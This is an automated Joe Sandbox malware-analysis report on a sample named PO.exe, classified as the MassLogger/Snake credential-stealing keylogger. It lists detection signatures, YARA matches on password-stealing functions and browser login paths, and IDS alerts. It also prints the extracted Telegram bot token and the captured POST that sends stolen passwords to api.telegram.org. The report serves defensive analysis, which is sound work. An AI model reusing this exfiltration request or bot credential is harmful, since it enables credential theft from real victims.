Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.exe

Overview

General Information

Sample name:PO.exe
Analysis ID:1586218
MD5:317fe502da9a45f02eb78096e44ff70d
SHA1:2077bc7190dcfd8266aba95f73f838851b2c66db
SHA256:b8c8a5c0f597a8d34813ce8f5e6a24832ccdad7bd0fa76e3d1f9adaf4639e795
Tags:exeuser-James_inthe_box
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 317FE502DA9A45F02EB78096E44FF70D)
    • RegAsm.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY", "Telegram Chatid": "6023628633"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xefb7:$a1: get_encryptedPassword
        • 0xf2df:$a2: get_encryptedUsername
        • 0xed52:$a3: get_timePasswordChanged
        • 0xee73:$a4: get_passwordField
        • 0xefcd:$a5: set_encryptedPassword
        • 0x10929:$a7: get_logins
        • 0x105da:$a8: GetOutlookPasswords
        • 0x103cc:$a9: StartKeylogger
        • 0x10879:$a10: KeyLoggerEventArgs
        • 0x10429:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          0.2.PO.exe.352e220.4.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.PO.exe.352e220.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.PO.exe.352e220.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.PO.exe.352e220.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xd3b7:$a1: get_encryptedPassword
                • 0xd6df:$a2: get_encryptedUsername
                • 0xd152:$a3: get_timePasswordChanged
                • 0xd273:$a4: get_passwordField
                • 0xd3cd:$a5: set_encryptedPassword
                • 0xed29:$a7: get_logins
                • 0xe9da:$a8: GetOutlookPasswords
                • 0xe7cc:$a9: StartKeylogger
                • 0xec79:$a10: KeyLoggerEventArgs
                • 0xe829:$a11: KeyLoggerEventArgsEventHandler
                0.2.PO.exe.352e220.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data
                • 0x12967:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 20 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T21:11:08.116847+010020577441Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T21:10:59.985867+010028032742Potentially Bad Traffic192.168.2.449732193.122.6.16880TCP
                2025-01-08T21:11:07.063997+010028032742Potentially Bad Traffic192.168.2.449732193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T21:11:07.715577+010018100081Potentially Bad Traffic192.168.2.449737149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: PO.exeAvira: detected
                Source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY", "Telegram Chatid": "6023628633"}
                Source: RegAsm.exe.7740.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendMessage"}
                Source: PO.exeReversingLabs: Detection: 55%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PO.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: PO.exe, 00000000.00000002.1683355480.0000000002491000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 026F5782h2_2_026F5367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 026F51B9h2_2_026F4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 026F5782h2_2_026F56AF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49737 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49737 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023628633&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2ff6ac886487Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 193.122.6.168:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023628633&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2ff6ac886487Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: RegAsm.exe, 00000002.00000002.4145529270.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 00000000.00000002.1688975226.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.PO.exe.352e220.4.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0234E0840_2_0234E084
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_06FB17010_2_06FB1701
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FC1682_2_026FC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FCAB02_2_026FCAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F19B82_2_026F19B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F7E682_2_026F7E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F4F082_2_026F4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F2DD12_2_026F2DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FC3872_2_026FC387
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FCAAF2_2_026FCAAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FB9E02_2_026FB9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026FB9DC2_2_026FB9DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F7E672_2_026F7E67
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_026F4EF82_2_026F4EF8
                Source: PO.exe, 00000000.00000002.1683355480.000000000250B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs PO.exe
                Source: PO.exe, 00000000.00000002.1683355480.000000000250B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs PO.exe
                Source: PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVebinace.dll2 vs PO.exe
                Source: PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs PO.exe
                Source: PO.exe, 00000000.00000002.1683355480.0000000002491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoses.dll, vs PO.exe
                Source: PO.exe, 00000000.00000002.1682314157.0000000000964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNone.exe* vs PO.exe
                Source: PO.exe, 00000000.00000002.1681426661.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO.exe
                Source: PO.exe, 00000000.00000000.1667396143.00000000001B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNone.exe* vs PO.exe
                Source: PO.exeBinary or memory string: OriginalFilenameNone.exe* vs PO.exe
                Source: PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
